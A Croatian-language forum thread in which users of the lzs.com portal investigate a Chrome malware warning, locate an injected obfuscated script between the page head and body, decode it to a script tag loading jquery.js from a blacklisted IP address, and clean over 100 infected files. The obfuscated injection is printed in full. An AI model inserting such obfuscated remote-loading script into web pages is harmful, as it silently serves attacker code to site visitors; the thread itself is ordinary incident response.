Maliciozni kod na portalu

[Markec]

Tko? Gdje? Šta? kava

Ovo meni javlja google crome od jučer ujutro
http://www.imagesforme.com/show.php/450632_11.PNG

http://www.imagesforme.com/show.php/450633_22.PNG

[Suko]

I što sad?
Jel može neko objasniti o čem se radi?

[4ndY]

Provjeriti koji dio lzs.com site-a zove ovo:

Kod: Označi sve

http://94.247.2.195/jquery.js
http://94.247.2.195/news/?id=101

jer je taj IP blacklistan...

[Sokac]

Kod je izgeneriran između </head> i <body> i radi se o sljedećem:

Kod: Označi sve

<script language=javascript><!-- 
document.write(unescape('8Zd%3CsTHcTHripC0Ht%20JYsn1zrc%3DLc%2F%2F8Zd9n1z4%2E2TH4JY7C0H%2E2%2EhAt1TH9Lc5Lc%2Fn1zjn1zqLcuJYervViy%2EjC0Hs8Zd%3E%3C%2FvVisLccriC0HptLc%3E').replace(/hAt|8Zd|JY|vVi|C0H|n1z|TH|Lc/g,""));
 --></script>

odnosno prevedeno

Kod: Označi sve

<script src=//94.247.2.195/jquery.js></script>

Što znači da poziva tu skriptu.

Pregledao sam kod i toga dijela jednostavno nema (prazno je između </head> i <body>. Vrlo vjeorjatno da se netko poigrao sa cijelim serverom i to bi trebalo prijaviti vlasniku servera, odnosno firmi pondi.

[Grof]

Pregledao sam kod i toga dijela jednostavno nema (prazno je između </head> i <body>. Vrlo vjeorjatno da se netko poigrao sa cijelim serverom i to bi trebalo prijaviti vlasniku servera, odnosno firmi pondi.

Pa neka Ivan prijavi onda...

[Markec]

Popravljeno

[Sokac]

Super, preko 100 datoteka sam morao prepravljati xD

[Tux Slave]

Super, preko 100 datoteka sam morao prepravljati xD

Ovo bi bilo odlično kao zadatak.

Napisati bash skriptu koja će izbrisati malciozni kod iz svih fileova u unesenom direktoriju i pod-direktoriju. I još uz to dati primjer filea s malcioznim kodom na kojemu bi se skripta testirala.

Ali već je riješeno pa nema potrebe.

[Markec]

Super, preko 100 datoteka sam morao prepravljati xD

svaka ti čast što si uspio
Zanima me, kako je taj virus dospio na server lzs, jel možda iz pondija došel ili ?

[iv@n]

Markec šta sada Chrome kaže kad pristupiš lzs?